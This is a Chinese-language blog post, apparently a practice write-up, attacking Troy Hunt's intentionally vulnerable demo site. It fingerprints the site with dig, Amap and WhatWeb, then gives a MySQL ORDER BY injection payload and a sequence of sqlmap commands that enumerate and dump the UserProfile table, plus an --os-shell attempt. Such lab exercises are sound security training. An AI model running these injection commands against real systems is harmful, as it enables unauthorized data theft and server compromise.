这个网站上面有很多的OWASP10的缺陷,可以练习提高我们的技术水平.
1. 首先尝试下Amap, Amap 作为一个扫描工具,可以探测 Web Application 的Version.
-
https://tools.kali.org/information-gathering/amap
首先,我们来找出hackyourselffirst.troyhunt.com 的IP地址.
-
dig @8.8.8.8 hackyourselffirst.troyhunt.com A
; <<>> DiG 9.10.3-P4-Debian <<>> @8.8.8.8 hackyourselffirst.troyhunt.com A
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6927
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;hackyourselffirst.troyhunt.com. IN A
;; ANSWER SECTION:
hackyourselffirst.troyhunt.com. 286 IN CNAME hackyourselffirst.azurewebsites.net.
hackyourselffirst.azurewebsites.net. 3586 IN CNAME waws-prod-bay-003.vip.azurewebsites.windows.net.
waws-prod-bay-003.vip.azurewebsites.windows.net. 286 IN CNAME waws-prod-bay-003.cloudapp.net.
waws-prod-bay-003.cloudapp.net. 46 IN A 137.117.17.70
;; Query time: 52 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Mon Nov 20 14:59:53 CST 2017
;; MSG SIZE rcvd: 223
IP地址是137.117.17.70 , 同时我们可以知道这个hackyourselffirst.troyhunt.com 有很多的别名(CNAME).
然后用Amap来探测下后台的Web application.
-
amap -bqv 137.117.17.70 80
-
Using trigger file /etc/amap/appdefs.trig ... loaded 30 triggers
-
Using response file /etc/amap/appdefs.resp ... loaded 346 responses
-
Using trigger file /etc/amap/appdefs.rpc ... loaded 450 triggers
-
-
amap v5.4 (www.thc.org/thc-amap) started at 2017-11-20 15:02:35 - APPLICATION MAPPING mode
-
-
Total amount of tasks to perform in plain connect mode: 23
-
Waiting for timeout on 23 connections ...
-
Protocol on 137.117.17.70:80/tcp matches http - banner: HTTP/1.1 404 Not Found\r\nContent-Type text/html\r\nServer Microsoft-IIS/8.0\r\nDate Mon, 20 Nov 2017 070235 GMT\r\nConnection close\r\nContent-Length 5144\r\n\r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n <title>Microsoft Azure Web App - Error 404</titl
-
Protocol on 137.117.17.70:80/tcp matches http-iis - banner: HTTP/1.1 404 Not Found\r\nContent-Type text/html\r\nServer Microsoft-IIS/8.0\r\nDate Mon, 20 Nov 2017 070235 GMT\r\nConnection close\r\nContent-Length 5144\r\n\r\n<!DOCTYPE html>\r\n<html>\r\n<head>\r\n <title>Microsoft Azure Web App - Error 404</titl
-
Protocol on 137.117.17.70:80/tcp matches http-apache-2 - banner: HTTP/1.1 400 Bad Request\r\nContent-Type text/html; charset=us-ascii\r\nServer Microsoft-HTTPAPI/2.0\r\nDate Mon, 20 Nov 2017 070234 GMT\r\nConnection close\r\nContent-Length 326\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
结果并不明确,这个网站使用的可能是IIS 也可能是Apache .
Amap的结果不让人满意,接着尝试Whatweb scanner
2. Whatweb 的网站 https://www.morningstarsecurity.com/research/whatweb
Whatweb的命令行参数看起来要多的多.
-
Usage: whatweb [options] <URLs>
-
-
TARGET SELECTION:
-
<TARGETs> Enter URLs, hostnames, IP adddresses, or
-
nmap-format IP ranges.
-
--input-file=FILE, -i Read targets from a file.
-
-
AGGRESSION:
-
--aggression, -a=LEVEL Set the aggression level. Default: 1.
-
1. Stealthy Makes one HTTP request per target and also
-
follows redirects.
-
3. Aggressive If a level 1 plugin is matched, additional
-
requests will be made.
-
-
PLUGINS:
-
--list-plugins, -l List all plugins.
-
--info-plugins, -I=[SEARCH] List all plugins with detailed information.
-
Optionally search with a keyword.
-
--search-plugins=STRING Search plugins for a keyword.
-
--grep, -g=STRING Search for STRING in HTTP responses. Reports
-
with a plugin named Grep.
-
OUTPUT:
-
--verbose, -v Verbose output includes plugin descriptions.
-
Use twice for debugging.
-
--colour,--color=WHEN control whether colour is used. WHEN may be
-
`never', `always', or `auto'.
-
-
HELP & MISCELLANEOUS:
-
--short-help This short usage help.
-
--help, -h Complete usage help.
-
-
EXAMPLE USAGE:
-
* Scan example.com.
-
./whatweb example.com
-
* Scan reddit.com slashdot.org with verbose plugin descriptions.
-
./whatweb -v reddit.com slashdot.org
-
* An aggressive scan of wired.com detects the exact version of WordPress.
-
./whatweb -a 3 www.wired.com
-
* Scan the local network quickly and suppress errors.
-
whatweb --no-errors 192.168.0.0/24
-
* Scan the local network for HTTPS websites.
-
whatweb --no-errors --url-prefix https:// 192.168.0.0/24
-
* Scan for crossdomain policies in the Alexa Top 1000.
-
./whatweb -i plugin-development/alexa-top-100.txt \
-
--url-suffix /crossdomain.xml -p crossdomain_xml
-
-
Note: This is the short usage help.
-
For the complete usage help use -h or --help.
使用whatWeb来探测下,得到的信息要多的多.
-
whatweb -v hackyourselffirst.troyhunt.com
-
WhatWeb report for http://hackyourselffirst.troyhunt.com
-
Status : 200 OK
-
Title : Supercar Showdown - Supercar Showdown
-
IP : 137.117.17.70
-
Country : UNITED STATES, US
-
-
Summary : JQuery, ASP_NET[4.0.30319][MVC5.1], HttpOnly[ARRAffinity,ASP.NET_SessionId], Cookies[ARRAffinity,ASP.NET_SessionId,VisitStart], UncommonHeaders[x-aspnetmvc-version], HTML5, X-Powered-By[ASP.NET], X-XSS-Protection[0], Microsoft-IIS[8.0], Script[text/javascript], HTTPServer[Microsoft-IIS/8.0], Google-Analytics[Universal][UA-43629727-1]
-
-
Detected Plugins:
-
[ ASP_NET ]
-
ASP.NET is a free web framework that enables great Web
-
applications. Used by millions of developers, it runs some
-
of the biggest sites in the world.
-
-
Version : 4.0.30319 (from X-AspNet-Version HTTP header)
-
String : MVC5.1
-
Google Dorks: (2)
-
Website : http://www.asp.net/
-
-
[ Cookies ]
-
Display the names of cookies in the HTTP headers. The
-
values are not returned to save on space.
-
-
String : ASP.NET_SessionId
-
String : VisitStart
-
String : ARRAffinity
-
-
[ Google-Analytics ]
-
This plugin identifies the Google Analytics account.
-
-
Version : Universal
-
Account : UA-43629727-1
-
Website : http://www.google.com/analytics/
-
-
[ HTML5 ]
-
HTML version 5, detected by the doctype declaration
-
-
-
[ HTTPServer ]
-
HTTP server header string. This plugin also attempts to
-
identify the operating system from the server header.
-
-
String : Microsoft-IIS/8.0 (from server string)
-
-
[ HttpOnly ]
-
If the HttpOnly flag is included in the HTTP set-cookie
-
response header and the browser supports it then the cookie
-
cannot be accessed through client side script - More Info:
-
http://en.wikipedia.org/wiki/HTTP_cookie
-
-
String : ARRAffinity,ASP.NET_SessionId
-
-
[ JQuery ]
-
A fast, concise, JavaScript that simplifies how to traverse
-
HTML documents, handle events, perform animations, and add
-
AJAX.
-
-
Website : http://jquery.com/
-
-
[ Microsoft-IIS ]
-
Microsoft Internet Information Services (IIS) for Windows
-
Server is a flexible, secure and easy-to-manage Web server
-
for hosting anything on the Web. From media streaming to
-
web application hosting, IIS's scalable and open
-
architecture is ready to handle the most demanding tasks.
-
-
Version : 8.0
-
Website : http://www.iis.net/
-
-
[ Script ]
-
This plugin detects instances of script HTML elements and
-
returns the script language/type.
-
-
String : text/javascript
-
-
[ UncommonHeaders ]
-
Uncommon HTTP server headers. The blacklist includes all
-
the standard headers and many non standard but common ones.
-
Interesting but fairly common headers should have their own
-
plugins, eg. x-powered-by, server and x-aspnet-version.
-
Info about headers can be found at www.http-stats.com
-
-
String : x-aspnetmvc-version (from headers)
-
-
[ X-Powered-By ]
-
X-Powered-By HTTP header
-
-
String : ASP.NET (from x-powered-by string)
-
-
[ X-XSS-Protection ]
-
This plugin retrieves the X-XSS-Protection value from the
-
HTTP header. - More Info:
-
http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
-
aspx
-
-
String : 0
-
-
HTTP Headers:
-
HTTP/1.1 200 OK
-
Cache-Control: private
-
Content-Length: 3276
-
Content-Type: text/html; charset=utf-8
-
Content-Encoding: gzip
-
Vary: Accept-Encoding
-
Server: Microsoft-IIS/8.0
-
Set-Cookie: ASP.NET_SessionId=1ifarra5yyutpekgrkxcmcab; path=/; HttpOnly
-
Set-Cookie: VisitStart=11/20/2017 7:53:15 AM; path=/
-
X-XSS-Protection: 0
-
X-AspNetMvc-Version: 5.1
-
X-AspNet-Version: 4.0.30319
-
X-Powered-By: ASP.NET
-
Set-Cookie: ARRAffinity=a58b2af319235c59b570f5ff28442356c3b989ad5027b21b3d5cc5b39074afda;Path=/;HttpOnly;Domain=hackyourselffirst.troyhunt.com
-
Date: Mon, 20 Nov 2017 07:53:11 GMT
-
Connection: close
3. 使用sqlmap 来做sqlinjection .
URL:
这里因为是orderby ,所以payload 应该是 orderby 字句,遗憾的是我不会sqlserver orderby 的hack. 只能依赖sqlmap了,如果是mysql, 可以使用如下的sql语句来hack.
-
select id from news where id=1 order by 1,(select case when(1=2) then 1 else 1* (select table_name from information_schema.tables)end)=1;
sqlmap是个很强大的武器,经过我的实验,以下都能使用.其中dump数据的最后一个语句要跑4,5分钟的样子。
-
sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --dbs
-
sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --current-user
-
sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --current-db
-
sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --tables -D 'hackyourselffirst_db'
-
sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --column -T UserProfile -D 'hackyourselffirst_db'
-
sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --dump -T UserProfile -D 'hackyourselffirst_db
唯独--os-shell 的语句并不成功.
-
sqlmap -u http://hackyourselffirst.troyhunt.com/Make/1?orderby=supercarid --os-shell
不过我已经很满足了,sqlmap 是个很强大的自动化sqlinjection 工具。一个人不见得能掌握所有的可以hack的sql 字句,sqlmap这时候起到了很关键的作用。
阅读(1362) | 评论(0) | 转发(0) |